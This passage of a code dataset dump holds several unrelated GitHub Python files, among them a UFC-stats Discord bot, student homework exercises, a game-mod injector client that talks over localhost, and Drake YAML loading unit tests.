print(dscore)\nprint(dscore.sort_values('score',ascending=False))\n","repo_name":"Aunch009/Machine_learning_study","sub_path":"machine_learing_muti_cassification.py","file_name":"machine_learing_muti_cassification.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42391967367","text":"import os\nfrom bs4 import BeautifulSoup\nimport requests \nimport discord\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\nclient = commands.Bot(command_prefix='$')\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\nURL = 'http://statleaders.ufc.com/'\n\ndef ufc_table(ID): \n mes = ''\n mes += '```'\n page = requests.get(URL)\n soup = BeautifulSoup(page.content, 'html.parser')\n total_fight_table = soup.find('article', id= ID, class_='results-group Fights-group')\n rows = total_fight_table.find_all('div', class_='results-table--tr')[1::]\n headers = total_fight_table.find_all('div', class_='results-table--tr')[0]\n row_titles = headers('span')\n header_text = [row_titles[0].get_text(), row_titles[1].get_text(),row_titles[2].get_text()]\n mes += '\\n' + header_text[0]\n for head in header_text[1:]: \n mes += '\\t' + head \n for fighter in rows: \n name = fighter.a.text\n link = fighter.a['href']\n stats = fighter('span')\n rank = stats[0].get_text()\n points = stats[2].get_text()\n mes += '\\n' + rank + '\\t' + name + '\\t' + points\n mes += '\\n' + '```'\n return mes\n\n@client.command(name = 'totalfights')\nasync def total_fights_display(com): \n table = ufc_table(\"TotalFights-group\")\n await com.send(table)\n\n@client.command(name = 'wins')\nasync def wins_display(com): \n table = ufc_table(\"Wins-group\")\n await com.send(table)\n\n@client.command(name = \"fin\")\nasync def finish_display(com): \n table = ufc_table(\"Finishes-group\")\n await com.send(table)\n\n@client.command(name = \"ko\")\nasync def ko_display(com): \n table = ufc_table(\"KOTKOWins-group\")\n await com.send(table)\n\n@client.command(name = \"sub\")\nasync def sub_display(com): \n table = ufc_table(\"SubmissionWins-group\")\n await com.send(table)\n\n@client.command(name = \"decision\")\nasync def decision_display(com): \n table = ufc_table(\"DecisionWins-group\")\n await com.send(table)\n\n@client.command(name = \"streak\")\nasync def streak_display(com): \n table = ufc_table(\"WinStreak-group\")\n await 
com.send(table)\n\n@client.command(name = \"titles\")\nasync def titles_display(com): \n table = ufc_table(\"TitleFightWins-group\")\n await com.send(table)\n\n@client.command(name = \"awards\")\nasync def awards_display(com): \n table = ufc_table(\"TotalAwards-group\")\n await com.send(table)\n\nJBPATH = os.getenv('GIF_PATH')\n\n@client.command()\nasync def jb(ctx): \n file = discord.File(JBPATH, filename = 'justbleedguy.gif')\n bleed = discord.Embed(\n title = 'JUST BLEEEEED', \n colour = discord.Colour.red()\n )\n bleed.set_image(url = 'attachment://justbleedguy.gif') \n await ctx.send(file = file, embed=bleed)\n\nclient.run(TOKEN)","repo_name":"SxChen97/UFCStats","sub_path":"ufc_leaderboard_bot.py","file_name":"ufc_leaderboard_bot.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5161600807","text":"#12: Darren Zou & Darren Liang\na = [\"a\",\"e\",\"i\",\"o\",\"u\"]\n\ndef pigLatin (word):\n for vowels in a:\n if word[0].lower() == vowels:\n return word + \"ay\"\n else:\n return word[1:] + word[0] + \"ay\"\n \n \n \nprint(pigLatin(\"apwple\"))\nprint(pigLatin(\"cake\"))\n","repo_name":"Darren120/csci127-assignments","sub_path":"hw_02/lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33475112325","text":"from aiogram.types import User, Chat\n\nTEST_USER = User(id=123, is_bot=False, first_name='Test', last_name='Bot',\n username='testtest', language_code='ru-RU', is_premium=None,\n added_to_attachment_menu=None, can_join_groups=None,\n can_read_all_group_messages=None, supports_inline_queries=None)\n\nTEST_USER_CHAT = Chat(id=333, type='private', title=None,\n username=TEST_USER.username, first_name=TEST_USER.first_name,\n last_name=TEST_USER.last_name, is_forum=None,\n photo=None, active_usernames=None,\n emoji_status_custom_emoji_id=None, bio=None,\n has_private_forwards=None, has_restricted_voice_and_video_messages=None,\n join_to_send_messages=None, join_by_request=None,\n description=None, invite_link=None,\n pinned_message=None, permissions=None,\n slow_mode_delay=None, message_auto_delete_time=None,\n has_aggressive_anti_spam_enabled=None, has_hidden_members=None,\n has_protected_content=None, sticker_set_name=None,\n can_set_sticker_set=None, linked_chat_id=None,\n location=None)\n","repo_name":"lizonn/healthy-food-bot","sub_path":"tests/bot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21143304979","text":"import struct\nimport time\nimport socket\nimport subprocess\nimport atexit\n\nclass InjectionAPI:\n injector_filepath = \"C:/Program Files (x86)/Steam/steamapps/workshop/content/387990/1771470800/sminject.exe\"\n\n def __init__(self):\n self.subprocess = None\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\n self.address = ('127.0.0.1', 25752)\n\n self.socket.settimeout(0.001) #1 second timeout\n\n def start(self):\n try:\n self.subprocess = subprocess.Popen(InjectionAPI.injector_filepath)\n\n time.sleep(0.5)\n if self.subprocess.poll() != None: #subprocess return None if alive\n print(\"Error polling subprocess.\")\n return -1\n\n self.scan()\n self.poll()\n\n atexit.register(self.cleanup)\n\n except OSError as err:\n print(err)\n\n def cleanup(self):\n if self.subprocess and 
self.subprocess.poll() == None:\n self.subprocess.kill()\n\n def scan(self):\n self.socket.sendto(struct.pack(\">B\", 0x03), self.address)\n\n def poll(self):\n self.socket.sendto(struct.pack(\">B\", 0x04), self.address)\n\n def set_value(self, id, value):\n packet = bytearray(b'\\x01')\n packet.extend(struct.pack(\">Id\", id, value))\n self.socket.sendto(packet, self.address)\n\n def ask_value(self, ids):\n packet = bytearray(b'\\x02')\n for id in ids:\n packet.extend(struct.pack(\">I\", id))\n\n # print(\"ask_value packet: \", packet) #DEBUG\n self.socket.sendto(packet, self.address)\n\n def recv_value(self):\n try:\n data = self.socket.recv(1024)\n except socket.error:\n return []\n\n # print(\"packet data: {}\".format(data))\n\n # -1 for 0x0A byte and divide by 12 because size of channel (4byte) + value(8bytes)\n length = struct.unpack(\">h\", data[0:2])\n length = (length[0] - 1) // 12\n\n unpacked_data = struct.unpack(\">\" + \"Id\"*length, data[3:])\n # unpacked_data = struct.unpack(\">hBId\", data)\n print(unpacked_data)\n\n result = list(zip(*[iter(data)]*2))\n return result\n\n # def ask_value(self, id):\n # packet = bytearray(b'\\x02')\n # packet.extend(struct.pack(\">I\", id))\n # self.socket.sendto(packet, self.address)\n #\n # def recv_value(self):\n # # header = self.socket.recv(2)\n # data = self.socket.recv(128)\n # print(\"packet data: {}\".format(data))\n #\n # def get_value(self, id):\n # self.ask_value(id)\n # time.sleep(0.01)\n # self.recv_value()\n","repo_name":"Rafale25/python_injection_interface_SM","sub_path":"injectionAPI.py","file_name":"injectionAPI.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70741856874","text":"n = int(input())\nal = list(map(int, input().split()))\ns = sum(al)\nif s / 10 != s // 10:\n print(\"No\")\n exit()\ns //= 10\n\n# しゃくとり法を2周: 長さがsを超えた時点でleftをシフトするためrightがleftを追い越すことはない\nlength = 0\nright = 0\nfor left in range(n * 2):\n while length + al[right % n] <= s:\n length += al[right % n]\n right += 1\n if length == s:\n print(\"Yes\")\n exit()\n if left == right:\n right += 1\n else:\n length -= al[left % n]\nprint(\"No\")","repo_name":"ymsk-sky/atcoder_part3","sub_path":"typical90/076_CakeCut.py","file_name":"076_CakeCut.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9465089799","text":"# Type: Homework\n# Level: 4\n# Section: 4.3: File I/O\n# Exercise: 7\n# Description: This contains tests for Loan classes\n# Create a program which does the following:\n#\n# a. Gives the user a choice of two options: (1) Add Loan, (2) Write file and exit.\n# i. If user enters ‘1’, prompt the user for the type of Loan, its asset name/value, its face\n# amount, rate, and term. Each prompt should occur one after the other. After the\n# last prompt, save the entry into a Loan object, notify the user that the loan has been\n# recorded, and return to the main menu.\n# ii. If user enters ‘2’, loop through all the entered loans and write them to a file. The file\n# should be in extension .csv. To do this properly, each sub-entry (loan type, asset\n# name, asset value, amount, rate, and term) should be separate by a comma. Each\n# loan should be separated by a newline.\n#\n# b. To verify that your generated .csv is a valid .csv file, try opening it in Excel once it has been\n# generated. 
You should see six columns and the number of rows should reflect the number\n# of loans.\n\n# Importing necessary packages\nfrom loan.loanpool import LoanPool\nfrom loan.loanIO import loanDataEntry, loanReadCSV\nimport logging\n#######################\n# To enable PyCharm to create log file\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n\n# Setting log file config\nlogging.basicConfig(filename='log.txt', filemode='a',\n format=\"{levelname} {processName:<12} {message} ({filename}:{lineno})\", style='{')\n#######################\n\n\ndef main():\n\n logging.getLogger().setLevel(logging.DEBUG) # Set logging level\n ###############################################\n\n # Initiate variable to receive user keyboard input\n master_key = ''\n logging.debug(f'Initiate {master_key} to take user input.')\n\n loanFile = 'loansRecord.csv' # Initiate a file name variable\n\n # Initiate empty lists for export and import\n loans_writeCSV = []\n loans_readCSV = []\n\n # Master key is the 2 options user are given\n # 1 prompt for data entry\n # 2 export data to CSV file\n # 3 import data from CSV file\n # 4 Display WAR WAM of all the loans\n\n master_key = 100\n while not master_key == '0':\n master_key = input('Press\\n'\n '1 to enter loan info\\n'\n '2 to write them to CSV. (exit to view result)\\n'\n '3 to import from CSV.\\n'\n '4 to see WAR and WAM of all loans (must run #3 import first)\\n'\n '0 to exit (you will lose all progress\\n'\n 'Input = ')\n\n #######################\n # 1 Execute prompt for data entry\n if master_key == '1':\n logging.debug(f'Initiate {loans_writeCSV} to save loan info.')\n\n try:\n logging.debug(f'Calling {loanDataEntry} to take user prompt.')\n loan1 = loanDataEntry() # Call the module to enter data\n loans_writeCSV.append(loan1) # add the data entry to a list\n except Exception as Ex:\n print(f'Failed. Unknown error. {Ex}')\n pass\n else:\n logging.debug(f'Data entry successful at {loan1}')\n print(f'Loan entry successfully recorded under: {loan1}.') # Display record to user\n logging.info(f'Current loans are: {loans_writeCSV}')\n print()\n #######################\n\n #######################\n # 2 Execute prompt for CSV export\n elif master_key == '2':\n try: # block to catch if file doesn't exist\n fileExport = open(loanFile, 'a')\n except FileNotFoundError as fnfEx:\n logging.error(f'Failed. {fnfEx}')\n else:\n logging.info(f'File founded {fileExport}.')\n count = 0\n for loan in loans_writeCSV: # loop through the list to write to csv\n logging.debug(f'Writing {loan} to CSV')\n # Write to CSV\n fileExport.write(f'{loan.__class__.__name__}, {loan.asset.__class__.__name__}, '\n f'{loan.asset.initialValue}, {loan.notional}, {loan.rate}, {loan.term}\\n')\n count += 1\n print(f'Successfully exported {count} loans to {loanFile}. See log for details.')\n print()\n logging.info(f'Successfully exported {count} loans to {loanFile}.')\n logging.info(f'Exported values are: {loans_writeCSV}')\n\n #######################\n\n #######################\n # 3 Execute prompt for CSV import\n elif master_key == '3':\n import_loanFile = input('Enter filepath to import = ')\n logging.info(f'Prompt user to choose path for CSV to import. {import_loanFile}')\n\n try: # block to catch if file doesn't exist\n fileImport = open(import_loanFile, 'r')\n except FileNotFoundError as fnfEx:\n logging.error(f'Failed. {fnfEx}')\n else:\n logging.info(f'File founded. 
{import_loanFile}')\n # Loop through line by line\n count = 0\n for line in fileImport:\n # For each line in the file:\n # 1. Strip special characters, replace space with '' and split them to a list\n # 2. Dissect the list by calling loanReadCSV(list), which:\n # 3. Append the result to a list and/or raise any error.\n try:\n loans_readCSV.append(loanReadCSV(line.strip().replace(' ', '').split(',')))\n except ValueError as valEx:\n print(f'Failed to process a line, see log.')\n logging.error(f'Failed to process line. {valEx}')\n except Exception as Ex:\n print(f'Failed to process a line, see log.')\n logging.error(f'Failed to process line. {Ex}')\n else:\n logging.info(f'Successfully imported line.')\n count += 1\n\n print(f'Successfully imported {count} lines from {import_loanFile}. See log for details.')\n print()\n logging.info(f'Successfully imported {count} lines from {import_loanFile}.')\n logging.info(f'Imported values are: {loans_readCSV}')\n #######################\n\n #######################\n # Calculate and display WAR WAM\n # Must run #3 first\n elif master_key == '4':\n logging.debug(f'Grabbing loans from {loans_readCSV}')\n print(f' WAR = {LoanPool(loans_readCSV).WAR()}') # Instantiate LoanPool object and call WAR\n print(f' WAM = {LoanPool(loans_readCSV).WAM()}') # Instantiate LoanPool object and call WAM\n print()\n #######################\n\n ###############################################\n\n\n#######################\nif __name__ == '__main__':\n main()\n","repo_name":"jeffsnguyen/Python","sub_path":"Level_4/Homework/Section_4_3_File_IO/Exercise_8/test_loan.py","file_name":"test_loan.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13582019041","text":"import copy\nimport dataclasses as dc\nimport functools\nimport math\nfrom math import inf, nan\nimport os\nfrom pathlib import Path\nfrom textwrap import dedent\nimport typing\nimport unittest\n\nimport numpy as np\n\nfrom pydrake.common import FindResourceOrThrow\nfrom pydrake.common.test.serialize_test_util import MyData2\nfrom pydrake.common.test_utilities.meta import (\n ValueParameterizedTest,\n run_with_multiple_values,\n)\nfrom pydrake.common.value import Value\nfrom pydrake.common.yaml import yaml_dump_typed, yaml_load_typed\n\n\n# To provide test coverage for all of the special cases of YAML loading, we'll\n# define some dataclasses. 
These classes mimic\n# drake/common/yaml/test/example_structs.h\n# and should be roughly kept in sync with the definitions in that file.\n\n\n@dc.dataclass\nclass FloatStruct:\n value: float = nan\n\n\n@dc.dataclass\nclass StringStruct:\n value: str = \"nominal_string\"\n\n\n@dc.dataclass\nclass AllScalarsStruct:\n some_bool: bool = False\n some_float: float = nan\n some_int: int = 11\n some_str: str = \"nominal_string\"\n\n\n@dc.dataclass\nclass ListStruct:\n value: typing.List[float] = dc.field(\n default_factory=lambda: list((nan,)))\n\n\n@dc.dataclass\nclass MapStruct:\n value: typing.Dict[str, float] = dc.field(\n default_factory=lambda: dict(nominal_float=nan))\n\n\n@dc.dataclass\nclass InnerStruct:\n inner_value: float = nan\n\n\n@dc.dataclass\nclass OptionalStruct:\n value: typing.Optional[float] = nan\n\n\n@dc.dataclass\nclass OptionalStructNoDefault:\n value: typing.Optional[float] = None\n\n\n@dc.dataclass\nclass NumpyStruct:\n # TODO(jwnimmer-tri) Once we drop support for Ubuntu 20.04 \"Focal\", then we\n # can upgrade to numpy >= 1.21 as our minimum at which point we can use the\n # numpy.typing module here to constrain the shape and/or dtype.\n value: np.ndarray = dc.field(\n default_factory=lambda: np.array([nan]))\n\n\n@dc.dataclass\nclass RejectGetattrNumpyStruct:\n value: np.ndarray = dc.field(\n default_factory=lambda: np.array([nan]))\n\n def __getattribute__(self, name):\n if name == \"value\":\n # When loading fields that do not support merging (i.e., lists),\n # yaml_load_typed is careful to not call getattr on data it doesn't\n # need. Check that invariant by rejecting such access here.\n raise NotImplementedError()\n return object.__getattribute__(self, name)\n\n def _value(self):\n return self.__dict__[\"value\"]\n\n\n@dc.dataclass\nclass VariantStruct:\n value: typing.Union[str, float, FloatStruct, NumpyStruct] = nan\n\n\n@dc.dataclass\nclass NullableVariantStruct:\n value: typing.Union[None, FloatStruct, StringStruct] = None\n\n\n@dc.dataclass\nclass ListVariantStruct:\n value: typing.List[typing.Union[str, float, FloatStruct, NumpyStruct]] = (\n dc.field(default_factory=lambda: list([nan])))\n\n\n@dc.dataclass\nclass OuterStruct:\n outer_value: float = nan\n inner_struct: InnerStruct = dc.field(\n default_factory=lambda: InnerStruct())\n\n\n@dc.dataclass\nclass OuterStructOpposite:\n # N.B. 
The opposite member order of OuterStruct.\n inner_struct: InnerStruct = dc.field(\n default_factory=lambda: InnerStruct())\n outer_value: float = nan\n\n\n@dc.dataclass\nclass Blank:\n pass\n\n\n@dc.dataclass\nclass OuterWithBlankInner:\n outer_value: float = nan\n inner_struct: Blank = dc.field(\n default_factory=lambda: Blank())\n\n\n@dc.dataclass\nclass BigMapStruct:\n value: typing.Mapping[str, OuterStruct] = dc.field(\n default_factory=lambda: dict(\n foo=OuterStruct(\n outer_value=1.0,\n inner_struct=InnerStruct(inner_value=2.0))))\n\n\nclass TestYamlTypedRead(unittest.TestCase,\n metaclass=ValueParameterizedTest):\n \"\"\"Detailed tests for the typed yaml_load function(s).\n\n This test class is the Python flavor of the C++ test suite at\n drake/common/yaml/test/yaml_read_archive_test.cc\n and should be roughly kept in sync with the test cases in that file.\n \"\"\"\n\n def _all_typed_read_options(\n sweep_allow_yaml_with_no_schema=(True, False),\n sweep_allow_schema_with_no_yaml=(True, False),\n sweep_retain_map_defaults=(True, False)):\n \"\"\"Returns the options matrix for our value-parameterized test cases.\n \"\"\"\n result = []\n for i in sweep_allow_yaml_with_no_schema:\n for j in sweep_allow_schema_with_no_yaml:\n for k in sweep_retain_map_defaults:\n result.append(dict(options=dict(\n allow_yaml_with_no_schema=i,\n allow_schema_with_no_yaml=j,\n retain_map_defaults=k,\n )))\n return result\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_float(self, *, options):\n cases = [\n (\"0\", 0.0),\n (\"1\", 1.0),\n (\"-1\", -1.0),\n (\"0.0\", 0.0),\n (\"1.2\", 1.2),\n (\"-1.2\", -1.2),\n (\"3e4\", 3e4),\n (\"3e-4\", 3e-4),\n (\"5.6e7\", 5.6e7),\n (\"5.6e-7\", 5.6e-7),\n (\"-5.6e7\", -5.6e7),\n (\"-5.6e-7\", -5.6e-7),\n (\"3E4\", 3e4),\n (\"3E-4\", 3e-4),\n (\"5.6E7\", 5.6e7),\n (\"5.6E-7\", 5.6e-7),\n (\"-5.6E7\", -5.6e7),\n (\"-5.6E-7\", -5.6e-7),\n ]\n for value, expected in cases:\n data = f\"value: {value}\"\n x = yaml_load_typed(schema=FloatStruct, data=data, **options)\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_float_missing(self, *, options):\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=FloatStruct, data=\"{}\",\n **options)\n self.assertTrue(math.isnan(x.value), msg=repr(x.value))\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=FloatStruct, data=\"{}\",\n **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_all_scalars(self, *, options):\n data = dedent(\"\"\"\n some_bool: true\n some_float: 101.0\n some_int: 102\n some_str: foo\n \"\"\")\n x = yaml_load_typed(schema=AllScalarsStruct, data=data, **options)\n self.assertEqual(x.some_bool, True)\n self.assertEqual(x.some_float, 101.0)\n self.assertEqual(x.some_int, 102)\n self.assertEqual(x.some_str, \"foo\")\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_list(self, *, options):\n cases = [\n (\"[1.0, 2.0, 3.0]\", [1.0, 2.0, 3.0]),\n ]\n for value, expected in cases:\n data = f\"value: {value}\"\n x = yaml_load_typed(schema=ListStruct, data=data, **options)\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_list_missing(self, *, options):\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=ListStruct, data=\"{}\", **options)\n self.assertTrue(len(x.value), 1)\n self.assertTrue(math.isnan(x.value[0]), msg=repr(x.value))\n 
else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=ListStruct, data=\"{}\", **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_map(self, *, options):\n data = dedent(\"\"\"\n value:\n foo: 0.0\n bar: 1.0\n \"\"\")\n x = yaml_load_typed(schema=MapStruct, data=data, **options)\n expected = dict(foo=0.0, bar=1.0)\n if options[\"retain_map_defaults\"]:\n expected.update(nominal_float=nan)\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_big_map_append(self, *, options):\n data = dedent(\"\"\"\n value:\n bar:\n outer_value: 3.0\n inner_struct:\n inner_value: 4.0\n \"\"\")\n x = yaml_load_typed(schema=BigMapStruct, data=data, **options)\n expected = dict(bar=OuterStruct(3.0, InnerStruct(4.0)))\n if options[\"retain_map_defaults\"]:\n expected.update(foo=OuterStruct(1.0, InnerStruct(2.0)))\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options(\n # When False, the parser raises an exception not worth testing for.\n sweep_allow_schema_with_no_yaml=[True]))\n def test_read_big_map_merge_new_outer_value(self, *, options):\n data = dedent(\"\"\"\n value:\n foo:\n outer_value: 3.0\n \"\"\")\n x = yaml_load_typed(schema=BigMapStruct, data=data, **options)\n expected = dict(foo=OuterStruct(3.0))\n if options[\"retain_map_defaults\"]:\n expected[\"foo\"].inner_struct.inner_value = 2.0\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options(\n # When False, the parser raises an exception not worth testing for.\n sweep_allow_schema_with_no_yaml=[True]))\n def test_read_big_map_merge_new_inner_value(self, *, options):\n data = dedent(\"\"\"\n value:\n foo:\n inner_struct:\n inner_value: 4.0\n \"\"\")\n x = yaml_load_typed(schema=BigMapStruct, data=data, **options)\n expected = dict(foo=OuterStruct(inner_struct=InnerStruct(4.0)))\n if options[\"retain_map_defaults\"]:\n expected[\"foo\"].outer_value = 1.0\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options(\n # When False, the parser raises an exception not worth testing for.\n sweep_allow_schema_with_no_yaml=[True]))\n def test_read_big_map_merge_empty(self, *, options):\n data = dedent(\"\"\"\n value:\n foo: {}\n \"\"\")\n x = yaml_load_typed(schema=BigMapStruct, data=data, **options)\n expected = dict(foo=OuterStruct())\n if options[\"retain_map_defaults\"]:\n expected[\"foo\"].outer_value = 1.0\n expected[\"foo\"].inner_struct.inner_value = 2.0\n self.assertEqual(x.value, expected)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_map_missing(self, *, options):\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=MapStruct, data=\"{}\", **options)\n self.assertEqual(x.value, dict(nominal_float=nan))\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=MapStruct, data=\"{}\", **options)\n\n # TODO(jwnimmer-tri) Add test cases similar to StdMapWithMergeKeys\n # and StdMapWithBadMergeKey from the C++ YAML test suite.\n\n # TODO(jwnimmer-tri) Add test cases similar to StdMapDirectly and\n # StdMapDirectlyWithDefaults from the C++ YAML test suite.\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_optional(self, *, options):\n # The test case numbers here (1..12) reference the specification as\n # documented in the C++ unit test yaml_read_archive_test.cc.\n for schema, data, expected in (\n 
(OptionalStructNoDefault, \"value: 1.0\", 1.0), # Case 1, 2\n (OptionalStruct, \"value: 1.0\", 1.0), # Case 3, 4\n (OptionalStructNoDefault, \"value:\", None), # Case 5, 6\n (OptionalStruct, \"value:\", None), # Case 7, 8\n (OptionalStructNoDefault, \"{}\", None), # Case 9, 10\n (OptionalStruct, \"{}\", (\n nan if options[\"allow_schema_with_no_yaml\"] # Case 12\n else None)), # Case 11\n ):\n with self.subTest(data=data, schema=schema):\n actual = yaml_load_typed(schema=schema, data=data, **options)\n self.assertEqual(actual, schema(expected))\n if options[\"allow_yaml_with_no_schema\"]:\n if \"value:\" in data:\n amended_data = \"foo: bar\\n\" + data\n else:\n amended_data = \"foo: bar\"\n actual = yaml_load_typed(\n schema=schema, data=amended_data, **options)\n self.assertEqual(actual, schema(expected))\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_variant(self, *, options):\n data = \"value: foo\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(x, VariantStruct(\"foo\"))\n self.assertEqual(type(x.value), str)\n\n data = \"value: !!str bar\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(x, VariantStruct(\"bar\"))\n self.assertEqual(type(x.value), str)\n\n data = \"value: !!float 1.0\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(x, VariantStruct(1.0))\n self.assertEqual(type(x.value), float)\n\n data = \"value: !FloatStruct { value: 1.0 }\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(x, VariantStruct(FloatStruct(1.0)))\n\n data = \"value: !NumpyStruct { value: [1.0, 2.0] }\"\n x = yaml_load_typed(schema=VariantStruct, data=data, **options)\n self.assertEqual(type(x.value), NumpyStruct)\n actual = x.value.value\n expected = np.array([1.0, 2.0])\n np.testing.assert_equal(actual, expected, verbose=True)\n\n data = \"value: !FloatStruct {}\"\n defaults = VariantStruct(FloatStruct(22.0))\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=VariantStruct, data=data,\n defaults=defaults, **options)\n self.assertEqual(x, defaults)\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=VariantStruct, data=data,\n defaults=defaults, **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_variant_missing(self, *, options):\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=VariantStruct, data=\"{}\", **options)\n self.assertTrue(math.isnan(x.value), msg=repr(x.value))\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=VariantStruct, data=\"{}\", **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_variant_found_no_tag(self, *, options):\n data = \"value:\"\n with self.assertRaisesRegex(RuntimeError, \"one of.*FloatStruct.*\"):\n yaml_load_typed(schema=VariantStruct, data=data, **options)\n data = \"value: [1.0, 2.0]\"\n with self.assertRaisesRegex(RuntimeError, \"str.*got.*list\"):\n yaml_load_typed(schema=VariantStruct, data=data, **options)\n data = \"value: { foo: bar }\"\n with self.assertRaisesRegex(RuntimeError, \"str.*got.*dict\"):\n yaml_load_typed(schema=VariantStruct, data=data, **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_variant_found_unknown_tag(self, *, options):\n data = \"value: !UnknownTag { foo: bar }\"\n with self.assertRaisesRegex(RuntimeError, \"UnknownTag.*match\"):\n 
yaml_load_typed(schema=VariantStruct, data=data, **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_list_variant(self, *, options):\n data = dedent(\"\"\"\n value:\n - foo\n - !!float 1.0\n - !FloatStruct { value: 2.0 }\n - !NumpyStruct { value: [3.0, 4.0] }\n \"\"\")\n x = yaml_load_typed(schema=ListVariantStruct, data=data, **options)\n self.assertEqual(len(x.value), 4)\n self.assertEqual(x.value[0], \"foo\")\n self.assertEqual(x.value[1], 1.0)\n self.assertEqual(x.value[2], FloatStruct(2.0))\n self.assertEqual(type(x.value[3]), NumpyStruct)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_np_vector(self, *, options):\n data = \"value: [1.0, 2.0, 3.0]\"\n expected = [1.0, 2.0, 3.0]\n x = yaml_load_typed(schema=NumpyStruct, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n\n data = \"value: [1.0]\"\n expected = [1.0]\n x = yaml_load_typed(schema=NumpyStruct, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n\n data = \"value: []\"\n expected = []\n x = yaml_load_typed(schema=NumpyStruct, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_np_matrix(self, *, options):\n data = dedent(\"\"\"\n value:\n - [0.0, 1.0, 2.0, 3.0]\n - [4.0, 5.0, 6.0, 7.0]\n - [8.0, 9.0, 10.0, 11.0]\n \"\"\")\n expected = [\n [0.0, 1.0, 2.0, 3.0],\n [4.0, 5.0, 6.0, 7.0],\n [8.0, 9.0, 10.0, 11.0],\n ]\n x = yaml_load_typed(schema=NumpyStruct, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_np_missing(self, *, options):\n schema = NumpyStruct\n data = \"{}\"\n expected = [nan]\n if options[\"allow_schema_with_no_yaml\"]:\n x = yaml_load_typed(schema=schema, data=data, **options)\n np.testing.assert_equal(x.value, np.array(expected), verbose=True)\n else:\n with self.assertRaisesRegex(RuntimeError, \".*missing.*\"):\n yaml_load_typed(schema=schema, data=data, **options)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_np_no_getattr(self, *, options):\n data = \"value: [1.0]\"\n expected = [1.0]\n x = yaml_load_typed(schema=RejectGetattrNumpyStruct, data=data,\n **options)\n np.testing.assert_equal(x._value(), np.array(expected), verbose=True)\n\n @run_with_multiple_values(_all_typed_read_options())\n def test_read_nested(self, *, options):\n data = dedent(\"\"\"\n outer_value: 1.0\n inner_struct:\n inner_value: 2.0\n \"\"\")\n x = yaml_load_typed(schema=OuterStruct, data=data, **options)\n expected = dict(foo=0.0, bar=1.0)\n self.assertEqual(x, OuterStruct(1.0, InnerStruct(2.0)))\n\n # TODO(jwnimmer-tri) Add a test case similar to NestedWithMergeKeys from\n # the C++ YAML test suite.\n\n # TODO(jwnimmer-tri) Add a test case similar to NestedWithBadMergeKey from\n # the C++ YAML test suite.\n\n # TODO(jwnimmer-tri) Add a test cases similar to these from the C++ YAML\n # test suite:\n 